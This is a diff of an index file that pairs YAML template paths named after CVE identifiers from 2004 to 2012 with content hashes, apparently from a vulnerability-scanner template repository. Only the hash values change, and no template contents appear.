+http/cves/2004/CVE-2004-1965.yaml:5026a55fddd6ed2a840c0da4dc0d0e54f7605454 +http/cves/2005/CVE-2005-2428.yaml:91b3fd4b70132d27b342c81c1a169842cebb35c9 +http/cves/2005/CVE-2005-3344.yaml:9d393845b5b17aced320286a7ddfc58e9c9808c0 +http/cves/2005/CVE-2005-3634.yaml:4d4eca32daed96e34bc0b8fd9282a44bd69c63b7 +http/cves/2005/CVE-2005-4385.yaml:8cd8fb3a0e1b8e51ce853b5af9acbc4a7777bd18 +http/cves/2006/CVE-2006-1681.yaml:7ca9e216c3e6581ed99da8ea856bc53aa03fe99e +http/cves/2006/CVE-2006-2842.yaml:8017a8996e678ea0d8b21dca8bc38b90f88138c7 +http/cves/2007/CVE-2007-0885.yaml:534745d36143ccc167889c080ab529b9e54b63b4 +http/cves/2007/CVE-2007-4504.yaml:b8cc1b2e1e0ec032073020c09bf0883aed56f957 +http/cves/2007/CVE-2007-4556.yaml:6c23b08c32e8cec4caf6fef33f6f972fff7cf8c7 +http/cves/2007/CVE-2007-5728.yaml:fccdb3dcc6ddfa2607b6c2e22832e705e12c6a03 +http/cves/2008/CVE-2008-1059.yaml:c1e8f0071316372a344b21d2ee6057090b9b66a5 +http/cves/2008/CVE-2008-1061.yaml:1012ae70877dfdc919abd89c486a114adcc17d36 +http/cves/2008/CVE-2008-1547.yaml:7361958f933b0ae7ad0824f93a4ef92dffa3f947 +http/cves/2008/CVE-2008-2398.yaml:415f4a9030cfd63ddb0c1dae5d481f0bb538a77d +http/cves/2008/CVE-2008-2650.yaml:f1dc345c873e9ca4295fa1444e2f8a8fe2695dc7 +http/cves/2008/CVE-2008-4668.yaml:a171df2dcf92a8bc26cf30a28ff7d43aef2dd119 +http/cves/2008/CVE-2008-4764.yaml:92c2aadbb7e7dea185601152d65af7fbbeffc3dd +http/cves/2008/CVE-2008-5587.yaml:3938a9ad7eccf9c75fba0e5c5c09574dbc235828 +http/cves/2008/CVE-2008-6080.yaml:1b65b32cf834cd789d8312a8151f168a9a020e67 +http/cves/2008/CVE-2008-6172.yaml:bab55ef446804b1a1ee4b33b6795ba9c514b5cd0 +http/cves/2008/CVE-2008-6222.yaml:c8dada72c6f7371953161116e6375f23166792d9 +http/cves/2008/CVE-2008-6465.yaml:89d1e671b820caca340b344a05e6b249510cab72 +http/cves/2008/CVE-2008-6668.yaml:02257c5262da35bd56c855de392641f10ef5f179 +http/cves/2008/CVE-2008-6982.yaml:89eaac0c6f233616b665d3cc359acc4d4f8477cb +http/cves/2008/CVE-2008-7269.yaml:ee80799db21feb39b03528b018d1ba61a8e43ada +http/cves/2009/CVE-2009-0347.yaml:a392282b0264c3ea8dc97e04b0137872a94d3e3b http/cves/2009/CVE-2009-0545.yaml:b36aafdb98fad8f1be9221bbb2cb22c5feb4cc8a -http/cves/2009/CVE-2009-0932.yaml:b19fa32886320d5b0ecb812359b2d7e30430edab -http/cves/2009/CVE-2009-1151.yaml:689ec829efd3e219750512cd417c1d7b71e053f7 -http/cves/2009/CVE-2009-1496.yaml:1ae3f7ae4a7872c99ad8060b79f38c80b910eb63 -http/cves/2009/CVE-2009-1558.yaml:38a874e8d6852176c3c855c2030d82174c477dcb -http/cves/2009/CVE-2009-1872.yaml:c63bd4cab85c8b422783985b72d458311bc6074f -http/cves/2009/CVE-2009-2015.yaml:4593468c46f795e56360fbf1e8eaaf5f70aa12e2 -http/cves/2009/CVE-2009-2100.yaml:f2da340268481636eba23f5cae86b36fb38cbdb6 -http/cves/2009/CVE-2009-3053.yaml:94925241a7c769c9f9120e534a7885a8bcfd99bf -http/cves/2009/CVE-2009-3318.yaml:9e559947bb64f1b99125b1fd8425e9a9384aa979 -http/cves/2009/CVE-2009-4202.yaml:c82f6ddb86601ba2470030242bd811210072d5eb -http/cves/2009/CVE-2009-4223.yaml:35ce780a8936f766aa059baf1f4db4aa6370684f -http/cves/2009/CVE-2009-4679.yaml:5d5077dff815333753fda16cd5fb228b9b1fb640 -http/cves/2009/CVE-2009-5020.yaml:2768584859ba688ee85344c4211a7f041040c694 -http/cves/2009/CVE-2009-5114.yaml:3801dd9e60025b512abacd820836688918e9ce40 -http/cves/2010/CVE-2010-0157.yaml:0583139639f5d8d180c2d67f86f85bf0df23451c -http/cves/2010/CVE-2010-0219.yaml:02e01ef9db973f9c4d6a0195e172168bc3cd8498 -http/cves/2010/CVE-2010-0467.yaml:6bbf14d1ab46e831cebc88a5a6eb3d597b9ef3c3 -http/cves/2010/CVE-2010-0696.yaml:f512c49cb97efb1cf501e548e87e4e7ec4fa6ef6 -http/cves/2010/CVE-2010-0759.yaml:c54f0d373e3f0c4f4633dade31e50bc190f40a71 -http/cves/2010/CVE-2010-0942.yaml:0a4d557d1b24787ea8cf14a565fa1c5c778a4f3f -http/cves/2010/CVE-2010-0943.yaml:922c1518f163d41b8da1c3be2d4151872d9064b0 -http/cves/2010/CVE-2010-0944.yaml:d2d4f792308e3b50dc3cc1e0297eaf957901474c -http/cves/2010/CVE-2010-0972.yaml:85b3b14667c03a4402628160ee47a899c0c02803 -http/cves/2010/CVE-2010-0982.yaml:a34ea798bd5a246b39a8ec4ba9c73a584ef6502c -http/cves/2010/CVE-2010-0985.yaml:3d7d04c87b78eb3175c56d0746385e2be3821c21 -http/cves/2010/CVE-2010-1056.yaml:be4f204f731f413944f565dbd33a5e330ea952e5 -http/cves/2010/CVE-2010-1081.yaml:3749a581e9d575076b65a1bbaba9494b6f5967dc -http/cves/2010/CVE-2010-1217.yaml:ce0795e631bc53222b8706bbf32cc81759bd7fdd -http/cves/2010/CVE-2010-1219.yaml:6b58e5a2ae3e4f90bce6c64a411dbe7ca560060f -http/cves/2010/CVE-2010-1302.yaml:53f367155e8108f92d6feb4584ff7df1cd5fff89 -http/cves/2010/CVE-2010-1304.yaml:0fbe1672741d94932efcc1b45794e07f7b0f5bb0 -http/cves/2010/CVE-2010-1305.yaml:48a854efd3eb4aaab88b27a6d259b351c506397d -http/cves/2010/CVE-2010-1306.yaml:fa926da1993a06970a225020bb5e6f417129bdc1 -http/cves/2010/CVE-2010-1307.yaml:bd07b09b2a2a99ebac3066a45772c641f1d10d9c -http/cves/2010/CVE-2010-1308.yaml:4a630183099ada0c51ab34e1cb8bb4d71d81b902 -http/cves/2010/CVE-2010-1312.yaml:e05e02f485f1aa7838f202579ab2141f130776eb -http/cves/2010/CVE-2010-1313.yaml:3b4749d8edd2566aaf4ffb39feb1fc61e3fec89f -http/cves/2010/CVE-2010-1314.yaml:3daa7d6d9379cee4e5f57d859b0723328a718ba5 -http/cves/2010/CVE-2010-1315.yaml:d94df362f465e94eba33b724283ebaeed1361d67 -http/cves/2010/CVE-2010-1340.yaml:d4db60fdba020e9f478b25c5b90a8b06c30cf4a9 -http/cves/2010/CVE-2010-1345.yaml:5735e03ea362583efda98794506957cc11d0052f -http/cves/2010/CVE-2010-1352.yaml:2c7789b0184a5a02fa196da0a290297c38ce33fb -http/cves/2010/CVE-2010-1353.yaml:73799ca45f57ad1e8a873402f14aa364ff800eed -http/cves/2010/CVE-2010-1354.yaml:420a18891d63fa521e098a6ecd6130de57cc2a33 -http/cves/2010/CVE-2010-1429.yaml:6ed890651a986c48e3ffb86ab0861e92af9504d4 -http/cves/2010/CVE-2010-1461.yaml:f1583ca74851018459907ca282fba903752d5332 -http/cves/2010/CVE-2010-1469.yaml:a0c651ff41fd42b8ffe4e242a2073db83d040c7d -http/cves/2010/CVE-2010-1470.yaml:95c9c1cf146e7e9be2bc1f478b311c3831aac81e -http/cves/2010/CVE-2010-1471.yaml:6425a679ae9cc3c7865df862accccee02f876668 -http/cves/2010/CVE-2010-1472.yaml:e2b3f96062b78b7e3b052192348262457da6ab16 -http/cves/2010/CVE-2010-1473.yaml:db864fd87ee4c220838af7667fab52f8a0e8f069 -http/cves/2010/CVE-2010-1474.yaml:bb52db200b4358152b9f9200d7ef108a0fb4f4fe -http/cves/2010/CVE-2010-1475.yaml:0be228583d43e21331e23f034b2dec1799631d22 -http/cves/2010/CVE-2010-1476.yaml:9c9fb716f1b34fb71dc005c2ab05fe87c39db35d -http/cves/2010/CVE-2010-1478.yaml:b408642803ad02a18c60daeccdefd2c24f7d7a95 -http/cves/2010/CVE-2010-1491.yaml:b3c7026429df38721cb8f813e1b26a7c7cae4776 -http/cves/2010/CVE-2010-1494.yaml:f8aff7993266f3ebfde8e064d961ba565727df4f -http/cves/2010/CVE-2010-1495.yaml:52eb23ea4bbab332b21a1153b4811fbe41ab46fa -http/cves/2010/CVE-2010-1531.yaml:9a8d5f6c691808af4582c896286b8674c53aadc2 -http/cves/2010/CVE-2010-1532.yaml:00fa43963a78fe7b07aca5548f2f79457a106187 -http/cves/2010/CVE-2010-1533.yaml:3f9395926fa021706ad442e7defbb01e72ab918f -http/cves/2010/CVE-2010-1534.yaml:080bf748733d6d77ae15498da0dc2150c5abd087 -http/cves/2010/CVE-2010-1535.yaml:2e94e14bbf4f2eea21b8a7eba992d7b2c17f1146 -http/cves/2010/CVE-2010-1540.yaml:865906f1d43a99833d59c07ce4a61bf9159f11ff -http/cves/2010/CVE-2010-1586.yaml:5531bdda6f3de65ef644e1d742ab1efd271aa039 -http/cves/2010/CVE-2010-1601.yaml:06a0f8a4756b8cdd716f2c9bcc93ae02cddb7eb8 -http/cves/2010/CVE-2010-1602.yaml:d1eb7535cf997000c94fec36263187ba84e9c280 -http/cves/2010/CVE-2010-1603.yaml:3d5e2a8f7043fc9b76a8f458fa5198448b8f7fb0 -http/cves/2010/CVE-2010-1607.yaml:a04d2e8a864c45d547311841ca4196b3ec0b8103 -http/cves/2010/CVE-2010-1653.yaml:c087bfa59d2d23ff94d2311c62014b5c29393150 -http/cves/2010/CVE-2010-1657.yaml:51b204f8d512f8a17efe12d9cfc04454ac72573d -http/cves/2010/CVE-2010-1658.yaml:8397ccf63160350ca6df00982e2d19da060de6da -http/cves/2010/CVE-2010-1659.yaml:c285779e2b2d81a770cd6a8a8df4dafdb41b4a3a -http/cves/2010/CVE-2010-1714.yaml:8c6a58c84e0b8a3ae27936d02bf3b3a4905f5742 -http/cves/2010/CVE-2010-1715.yaml:b15fa97041f99b671a962b8e75a7893ec4931a59 -http/cves/2010/CVE-2010-1717.yaml:1f19013be4b9308f0ba4310162a5267827b70bca -http/cves/2010/CVE-2010-1718.yaml:b22c91b1197aae9c0423295f148bdda491993271 -http/cves/2010/CVE-2010-1719.yaml:7d85df8073ab7ccd8ae9733397fb6234d8922ed7 -http/cves/2010/CVE-2010-1722.yaml:44d997ae6a1016d8d1ec9e75a6669fab394ac238 -http/cves/2010/CVE-2010-1723.yaml:d75cc24a4f9b53605e1192fab01aceb55d9ca7a1 -http/cves/2010/CVE-2010-1858.yaml:287791e937efdf5cd956c6036658f00d5ac82766 -http/cves/2010/CVE-2010-1870.yaml:8d8cf515658fd1dbfa22c78797c4f8583774c7de -http/cves/2010/CVE-2010-1875.yaml:8ddd7e14a8b5f1291672f31a0170029c460f97f1 -http/cves/2010/CVE-2010-1878.yaml:e33dccaa29408a992074a77436b02238d10853c9 -http/cves/2010/CVE-2010-1952.yaml:79f0f75ddca7474f662f9d1ed5a7de36ffdeab4f -http/cves/2010/CVE-2010-1953.yaml:2539c2b8a7ed477018b898560da946fd7ae3ce81 -http/cves/2010/CVE-2010-1954.yaml:05e5e689404c838986b5b07f82d1916076020b96 -http/cves/2010/CVE-2010-1955.yaml:c618e5cf6f7e8e679eeafb05edb9ffdc144d9a8c -http/cves/2010/CVE-2010-1956.yaml:4f815fbc3b6e4bcc2e2db37fa55613e496866a32 -http/cves/2010/CVE-2010-1957.yaml:d1d6fd4cac4b381caaee611eba59b9be70573af7 -http/cves/2010/CVE-2010-1977.yaml:ffbff231242f8a0f1adb143028bb3553295cfc88 -http/cves/2010/CVE-2010-1979.yaml:67a8a9b04e8675a5c776767dbfc1e8179bb4e116 -http/cves/2010/CVE-2010-1980.yaml:2b283a374b9c6ba22229305691471598993e8a1a -http/cves/2010/CVE-2010-1981.yaml:44cef5b5451d5ffcaf7be48f8ab4f552d0c13afb -http/cves/2010/CVE-2010-1982.yaml:d1bad5e5d67791643c437cf145f3997e3eb4866f -http/cves/2010/CVE-2010-1983.yaml:82a946ffd3bfee1eef0a71c438d65a7c58c6a0ec -http/cves/2010/CVE-2010-2033.yaml:e919127b3f05ade2878f670a8441db27070f1673 -http/cves/2010/CVE-2010-2034.yaml:24558af27a09e05ee10af07971be2e6227063510 -http/cves/2010/CVE-2010-2035.yaml:d258216633521680e1bc1a7e7d595509ea2716ca -http/cves/2010/CVE-2010-2036.yaml:b08ceffd64380e37d62677fa1e2321042675e2e1 -http/cves/2010/CVE-2010-2037.yaml:26bb5946e57f87fe19bfaff584f1c2d4018a7420 -http/cves/2010/CVE-2010-2045.yaml:4dda17755c4d6d77ab401f7b8670c8fc76427969 -http/cves/2010/CVE-2010-2050.yaml:ea04a5ba24d3234a9470b0712ec64a867c9d14bb -http/cves/2010/CVE-2010-2122.yaml:dc9083ded22c2128c7ea1a4dd6faba024e683d59 -http/cves/2010/CVE-2010-2128.yaml:7f3ab1f8f8499bca97e49ca621564467cf5028db -http/cves/2010/CVE-2010-2259.yaml:dacbd5137fcb685748fb7772f5282c4a2687f4fd -http/cves/2010/CVE-2010-2307.yaml:08f4bbc8f3d4c06f178785abeed006050859ae4e -http/cves/2010/CVE-2010-2507.yaml:47bcbe607dfe4b17f4840af63580438f9c857966 -http/cves/2010/CVE-2010-2680.yaml:9f12e3d4932ce5b368725e8354621eef04a58508 -http/cves/2010/CVE-2010-2682.yaml:dc6cfde01399afd1f5ce7cd6414b49d126e2ac51 -http/cves/2010/CVE-2010-2857.yaml:cb39a198e5037c87f8c4da636cce5c665b954d5a +http/cves/2009/CVE-2009-0932.yaml:66a4aa74dc909412d38d2fe7c278c40062ea01ad +http/cves/2009/CVE-2009-1151.yaml:af8efec2c45ce76c11a9d9a5fb226287e6c86646 +http/cves/2009/CVE-2009-1496.yaml:71973ae124425a3d3bee8bf3367afb1a447044b0 +http/cves/2009/CVE-2009-1558.yaml:d8189f187e2cfd8d9475161cbe729b1edc6956db +http/cves/2009/CVE-2009-1872.yaml:2194e737ac7e97621da293aadd51e1a11f74a829 +http/cves/2009/CVE-2009-2015.yaml:f702ac3b8b8913c4703e721f985fdf8ed4ea6833 +http/cves/2009/CVE-2009-2100.yaml:7a617456a198dce07b82c2b9d24cd83734f3193a +http/cves/2009/CVE-2009-3053.yaml:5c109edb9a06dfb9d9df8f8962722f28982bf538 +http/cves/2009/CVE-2009-3318.yaml:bc01bf95162ec6561d4bc18fc1831dbe9bdd43c8 +http/cves/2009/CVE-2009-4202.yaml:c9079cde634a813bae4d54437102370e94435697 +http/cves/2009/CVE-2009-4223.yaml:1422ff4b8f3711e590c7a6e578bc765763cbdadf +http/cves/2009/CVE-2009-4679.yaml:3f1ea84e718fd71f7441395c487595b51995d43a +http/cves/2009/CVE-2009-5020.yaml:8246da2d908cb838986ff206014ae9518912cb76 +http/cves/2009/CVE-2009-5114.yaml:ac11513ffb1dde9766b2a75a9379e4afd6bebe0e +http/cves/2010/CVE-2010-0157.yaml:20e3149182a5dc5cfb9a4c5757b83501656fda07 +http/cves/2010/CVE-2010-0219.yaml:efa400fef5e288f0b992ddcffed34286ed8d5bc2 +http/cves/2010/CVE-2010-0467.yaml:b218bfcbd2d0faa44bfca5a5581451fabd5978df +http/cves/2010/CVE-2010-0696.yaml:e4b0c3fcd0a06ddc692e2c4ac991194e57ba0ca6 +http/cves/2010/CVE-2010-0759.yaml:f074a04f2574e8e7509842b2af6c363acb7612a6 +http/cves/2010/CVE-2010-0942.yaml:29803c0fcb583e672f732ae63393f53f68f972d3 +http/cves/2010/CVE-2010-0943.yaml:b19c60ffb28260bf1747b26af08f592ca622360e +http/cves/2010/CVE-2010-0944.yaml:0bfa9fef4ec5da406eb7b4658fc4c06370566411 +http/cves/2010/CVE-2010-0972.yaml:9517847e2dfb9f5427c1e471c0f0392255067421 +http/cves/2010/CVE-2010-0982.yaml:316281c654e6e5cd3229d676027f8e8f5a34ca9d +http/cves/2010/CVE-2010-0985.yaml:371bd498c6a4cf704fda2f98e9d06c9e699741bb +http/cves/2010/CVE-2010-1056.yaml:d3ec9d3ba4dfe0649ca8added70b1a08233b1fb0 +http/cves/2010/CVE-2010-1081.yaml:375691ccc25f5ba2de0f062956ca63acb6d56636 +http/cves/2010/CVE-2010-1217.yaml:71f6383bf052cffcce881b93141b578ebc8b8f83 +http/cves/2010/CVE-2010-1219.yaml:b8863dbaeafa302616e1e698bedfb193ff0a3e73 +http/cves/2010/CVE-2010-1302.yaml:f9c354b7ff198a12a1728b4ca3b6e7ca0a43b32d +http/cves/2010/CVE-2010-1304.yaml:100d640b72021eeaf55dc2cac6800c0dbed8fdfa +http/cves/2010/CVE-2010-1305.yaml:d11b209d1666f54e0de4647e00d16e5e9571d1f0 +http/cves/2010/CVE-2010-1306.yaml:c709bb4b686d520fc5f80911dbe759f5707b5116 +http/cves/2010/CVE-2010-1307.yaml:6b9195a4e6a3544e193966733766fa799d043557 +http/cves/2010/CVE-2010-1308.yaml:27f81e26b3a5c07c80a6f7298867f0c7c70ac64c +http/cves/2010/CVE-2010-1312.yaml:124d8905449f4ba7d6e3e02c72b2ed4cd6e5b86b +http/cves/2010/CVE-2010-1313.yaml:28f6cc1337ff1450a60c9de4ac28bf163284983d +http/cves/2010/CVE-2010-1314.yaml:ab1ef4c65e717b08e8d4f122e73b79a40ffbcf37 +http/cves/2010/CVE-2010-1315.yaml:10d167b97aec98d0e55135195ac2387eeb8207fb +http/cves/2010/CVE-2010-1340.yaml:d3ece2394f369ec96cfc1f3774776675a32a3854 +http/cves/2010/CVE-2010-1345.yaml:aa603878dffecb692574088545524d4793551f4d +http/cves/2010/CVE-2010-1352.yaml:a98e475d76181d5e648f13f7574258b92effc7c1 +http/cves/2010/CVE-2010-1353.yaml:488c34e0804d222aeb45dad304c134b464e77cd3 +http/cves/2010/CVE-2010-1354.yaml:f6a304291d71b59d85ce40f7f717afbfa5e991b8 +http/cves/2010/CVE-2010-1429.yaml:fb9032fefbb27c431f0a03c59858373435385c72 +http/cves/2010/CVE-2010-1461.yaml:78631423e1b3672d1b9954b278e550b914e3f29b +http/cves/2010/CVE-2010-1469.yaml:50555959e9f247dfe43ee76ebfbd90da6faf6821 +http/cves/2010/CVE-2010-1470.yaml:718c92e44e9b25087c7966f96bafb07ab9335442 +http/cves/2010/CVE-2010-1471.yaml:bbe166193d4ca3f6cf88f9e88c92ebbbe22a9dfc +http/cves/2010/CVE-2010-1472.yaml:68d18826ce18ac104bd5111bee3f09801441cc0a +http/cves/2010/CVE-2010-1473.yaml:5f0b930888f66a1846f99a76fcff8d25f39626d4 +http/cves/2010/CVE-2010-1474.yaml:0aea8095506b7630f7c070bf93ce4f754ab38f88 +http/cves/2010/CVE-2010-1475.yaml:24a7506ccdf77ac858baba4de552871706e4dd4d +http/cves/2010/CVE-2010-1476.yaml:34e24ed11b0d02f8f7a73f6b876a68defc4b6f45 +http/cves/2010/CVE-2010-1478.yaml:ca4c209d79a0792bec198e8be26284e48c2814f1 +http/cves/2010/CVE-2010-1491.yaml:95a3b0d4d76bfbb9065aceb63e0761ce4190d80a +http/cves/2010/CVE-2010-1494.yaml:6dc0b39bbe548ac798d1ac6790008d70e6f1e027 +http/cves/2010/CVE-2010-1495.yaml:7c9e9c9a074e41cb0144dff006dc6f24ddff0120 +http/cves/2010/CVE-2010-1531.yaml:17dcf06d312cfda397b01917aa501014da73adc4 +http/cves/2010/CVE-2010-1532.yaml:3f66f6b25ebbd4faa8f47297d96eb6e65f7391fe +http/cves/2010/CVE-2010-1533.yaml:fa418a90fd6f0352ca261fe4413f150f8d05b463 +http/cves/2010/CVE-2010-1534.yaml:62c63c88a76b4fd7f9ad5939a315b5e23a99151d +http/cves/2010/CVE-2010-1535.yaml:f9ff41d168e248048fa708a016902539d04b817f +http/cves/2010/CVE-2010-1540.yaml:e9e9172fb48da4f9db8dbf26a42ff738a0eb9138 +http/cves/2010/CVE-2010-1586.yaml:5974625d041218a1463654172b3d39b216b0b423 +http/cves/2010/CVE-2010-1601.yaml:4154e530a4a006d6a759231c3b29bf2fc2d8b1e5 +http/cves/2010/CVE-2010-1602.yaml:efe6c94b909dc9888537fde91c0ca698e6a9710f +http/cves/2010/CVE-2010-1603.yaml:4508ff7cafb78be6dc64c94dcab333f8a65e81a8 +http/cves/2010/CVE-2010-1607.yaml:600b161070a0ea6082637f8b723eb21a218bcbf7 +http/cves/2010/CVE-2010-1653.yaml:165215918712b2b0f65a4bb32a46b0bb6e7fccb4 +http/cves/2010/CVE-2010-1657.yaml:a8773303d0b02ddd931badaa753dd20e468941f8 +http/cves/2010/CVE-2010-1658.yaml:2f634c016318ca12e8528d326c8769768590b3dc +http/cves/2010/CVE-2010-1659.yaml:d112b41f095776eb5df135ee0217bf0e45a07ff3 +http/cves/2010/CVE-2010-1714.yaml:d0be1a5017b2ad637012bc8d0635949b80f3d7ea +http/cves/2010/CVE-2010-1715.yaml:b25141d701b06e90b126ef7701af587308dddcdb +http/cves/2010/CVE-2010-1717.yaml:b7268b5545eeaa1cb4598b7f2526ef86fd08b8ef +http/cves/2010/CVE-2010-1718.yaml:98e1afd73a48dfd4600aeb3e7f6a7a81187b411c +http/cves/2010/CVE-2010-1719.yaml:27960a2bb19a161eaffb72fc03310c1c3ef813f4 +http/cves/2010/CVE-2010-1722.yaml:a3889059bb814db77c561144a46c9c4254ca31e5 +http/cves/2010/CVE-2010-1723.yaml:98ed63625d77c84aae0aad8f8ea9a5f6e2ab897d +http/cves/2010/CVE-2010-1858.yaml:698e6d7ec47cdeff0c1884dc4773f3b3521b8f6a +http/cves/2010/CVE-2010-1870.yaml:94bd8d34c25e637709ca8723d2fae31c06ff9bc0 +http/cves/2010/CVE-2010-1875.yaml:10c6417332c147cfd6713fa5166e9b56087ef06b +http/cves/2010/CVE-2010-1878.yaml:fe420b4d9b606206d645706d433adf9a1b95b166 +http/cves/2010/CVE-2010-1952.yaml:78fcfedda08dac97512a06b52c238ccacb97c176 +http/cves/2010/CVE-2010-1953.yaml:4c4736c582d5200eb67969c39e332a32fc6f6d83 +http/cves/2010/CVE-2010-1954.yaml:883f09d0e2efdc99bfbda72851a35361f7565555 +http/cves/2010/CVE-2010-1955.yaml:adb8fe4a92e7e4a6f1ddbb26fa189a2a70a652d0 +http/cves/2010/CVE-2010-1956.yaml:26b50c346e80c22b5d6e48a3b1e99e71d1d14320 +http/cves/2010/CVE-2010-1957.yaml:7fc4e2545d6cf5d84a0188f3e2d6259c084db92d +http/cves/2010/CVE-2010-1977.yaml:106b91d6e1529b670c429492d9acdc1fb3d4fec7 +http/cves/2010/CVE-2010-1979.yaml:f48dcd4a6d937eed7a19b2e160494e163dc1c597 +http/cves/2010/CVE-2010-1980.yaml:8091ac94e16c00e5b9cd2ed4da584760295a2179 +http/cves/2010/CVE-2010-1981.yaml:d1150ed6860fbe7983c4d5cbf707a204ffce0cb2 +http/cves/2010/CVE-2010-1982.yaml:642224acda9d1eca7bbd371ebf59a3c1b9b018fd +http/cves/2010/CVE-2010-1983.yaml:bd3b036ce445ffb2cb2b8da23f07b0f6e2a2e5c2 +http/cves/2010/CVE-2010-2033.yaml:d35d5be422286478fd18a4112e6e94548332cf1c +http/cves/2010/CVE-2010-2034.yaml:d2b4e302e8a4e04f92c9e16316ce5711194df900 +http/cves/2010/CVE-2010-2035.yaml:046b7981c1a973ee28c5d799717e992b68e558b9 +http/cves/2010/CVE-2010-2036.yaml:dcbf4de87e5f1d81baa0d0bc406c986f7b6d5716 +http/cves/2010/CVE-2010-2037.yaml:979a5a53959d2a87f23afe1eb00812b2a69f9fa7 +http/cves/2010/CVE-2010-2045.yaml:6b50751105bd698e84da1f904000115a7e18e1c4 +http/cves/2010/CVE-2010-2050.yaml:4308dd4a99e8707a79da95304584637125e5fafe +http/cves/2010/CVE-2010-2122.yaml:8b7028ba95f41fbb5c7aca47400fd93e18478c15 +http/cves/2010/CVE-2010-2128.yaml:9c132ee107803af4489ae227cb89d3887fb1cf34 +http/cves/2010/CVE-2010-2259.yaml:b4408900b73021cca619ac26bcad6f9da606ec66 +http/cves/2010/CVE-2010-2307.yaml:9220e3e14a66b5015ae6a79a70c0569862d0ad83 +http/cves/2010/CVE-2010-2507.yaml:263bbb332c7492582d8b406d79a1529d82dac8dc +http/cves/2010/CVE-2010-2680.yaml:09c603546c8d95f284b2dd4c3b87e18f6232b93c +http/cves/2010/CVE-2010-2682.yaml:a0c0e719ad90c7c6b5665541737148618403d16c +http/cves/2010/CVE-2010-2857.yaml:997c0e17be0ed142d8c1e1d62f1cacbcf8baa7f8 http/cves/2010/CVE-2010-2861.yaml:a28a0233aeeb248fcc1faba4b9eb4fb292bfc8c6 -http/cves/2010/CVE-2010-2918.yaml:50c03eeb9e33b4fb1cc1e79de3b55e643acabe89 -http/cves/2010/CVE-2010-2920.yaml:a36209e8ed68841d4f29c76a219ac234b5dc6b26 -http/cves/2010/CVE-2010-3203.yaml:c9fc4cf98ea01fc7935b4cff42c8a284876b2081 -http/cves/2010/CVE-2010-3426.yaml:3e286c582fc1e51c8b3621aca9e4c1cc14b45c4a -http/cves/2010/CVE-2010-4231.yaml:1ae9dffcb7dbf8709770ef9228708e3ad29c324a -http/cves/2010/CVE-2010-4239.yaml:e11da6084bc1a68b80e95c106d6a59508d6732ed -http/cves/2010/CVE-2010-4282.yaml:036b1d068f5439b97cfdde52792510535f01ee75 -http/cves/2010/CVE-2010-4617.yaml:3c3a46b51cc3a6918e4fd024f416465325aaff3f -http/cves/2010/CVE-2010-4719.yaml:21785e62e6c708fa6c3a9cef727d865a0037bb0c -http/cves/2010/CVE-2010-4769.yaml:40355900d4fad6470cb1c6c73a257259f9e819f3 -http/cves/2010/CVE-2010-4977.yaml:b01c8bf21f836e991d369c2b207b634637a7c236 -http/cves/2010/CVE-2010-5028.yaml:5d613f2e36a88d145d1e02ebb58a63afa81a678d -http/cves/2010/CVE-2010-5278.yaml:1c012dcc62af570e2b2f96019fd66987f96d0354 -http/cves/2010/CVE-2010-5286.yaml:a7bddb35574eccd7ba02ffadc6ee45b719b05546 -http/cves/2011/CVE-2011-0049.yaml:3ebf76034ab99dfd38c2b98a954e8b3221dc053b -http/cves/2011/CVE-2011-1669.yaml:420e6c0d261d9bd13b165ea1fd0c84564aec0a3b -http/cves/2011/CVE-2011-2744.yaml:9897a4f0c00d48d80e7bbca9f621a9589979e377 -http/cves/2011/CVE-2011-2780.yaml:8f5fd5e90f8003851669d5171fa2ccf55dcb113e +http/cves/2010/CVE-2010-2918.yaml:39908c2ca85dc6209ab7962f93ba522cb67741bd +http/cves/2010/CVE-2010-2920.yaml:474277eb54c956ca79b13e2dee0ad686a46a738c +http/cves/2010/CVE-2010-3203.yaml:c83d43a94685fdec0cb2314c322181ce365b4020 +http/cves/2010/CVE-2010-3426.yaml:b7a02aff375e41d126abab76742a4089f2816df3 +http/cves/2010/CVE-2010-4231.yaml:7929fcb13351d42af44c35f3430e6c6bae7fbeef +http/cves/2010/CVE-2010-4239.yaml:91ef94ce12f0e51b5432227875db7f3c34be86c2 +http/cves/2010/CVE-2010-4282.yaml:2c79b07914265aa92045a6a19ce2f6bb71fd797b +http/cves/2010/CVE-2010-4617.yaml:994a63b6c6fadb3fc3fa9fcf31f6e67b0d58e5b8 +http/cves/2010/CVE-2010-4719.yaml:dd4db91a58c8ff83157d705c72d8a42a2d19c03d +http/cves/2010/CVE-2010-4769.yaml:591aa222d2782bd221e40364dc7bad1cf94ba3f8 +http/cves/2010/CVE-2010-4977.yaml:1e3bafc7957fc1704f2631ac9998d6cb39adda8b +http/cves/2010/CVE-2010-5028.yaml:28157f5416e8189b2862df612989a10e048c4b0b +http/cves/2010/CVE-2010-5278.yaml:2282b85b846d39b5be63ff966bb854082aed11b0 +http/cves/2010/CVE-2010-5286.yaml:00216b6183df93bbab16d0005b2ddb34a8eeb954 +http/cves/2011/CVE-2011-0049.yaml:9093b5700bceb02a2cee2df618736d68f38555e8 +http/cves/2011/CVE-2011-1669.yaml:2eaa117726246bfd3a68b47096e2a12a8b872d00 +http/cves/2011/CVE-2011-2744.yaml:24fca40c93cdd1b1b50118bb3ed24948fd378028 +http/cves/2011/CVE-2011-2780.yaml:ddd97350d8535637fbf60c318f277c96e2cdb7ab http/cves/2011/CVE-2011-3315.yaml:cfe279d4b10bb959368be9b83f2a87a2af869eca -http/cves/2011/CVE-2011-4336.yaml:6dcd5125df25fd48738e2e4dac4aaea8c0c126bd -http/cves/2011/CVE-2011-4618.yaml:70804fe254435020dc8ce61b0cf106d98d46e3ce -http/cves/2011/CVE-2011-4624.yaml:713b8d62c1db934a58f26f1b40f0de238078966a -http/cves/2011/CVE-2011-4804.yaml:473c2b286ffa5aa1c35160e4af74a3dc11e76751 -http/cves/2011/CVE-2011-4926.yaml:6d56eb70caafd45d51a5ed8791ec982609bcd26f -http/cves/2011/CVE-2011-5106.yaml:404541714bac87c0f39929270d24a08448e24cb3 -http/cves/2011/CVE-2011-5107.yaml:3e7c933d2f918c7b796feb12e154ebc3e6f1ed31 -http/cves/2011/CVE-2011-5179.yaml:27d4e0726bc4ea9398827c856ae50b854283f5d8 -http/cves/2011/CVE-2011-5181.yaml:6cc71e3eaf583a723ba752042863f3e56796c3d1 -http/cves/2011/CVE-2011-5252.yaml:b6e4df680f87c289f835b2ddebc4d831d8f17777 -http/cves/2011/CVE-2011-5265.yaml:0d4b3730a441b140e058fba7887bf7203a54ad3e -http/cves/2012/CVE-2012-0392.yaml:cb2825935fed34a16052c543f8620388fe9dbd62 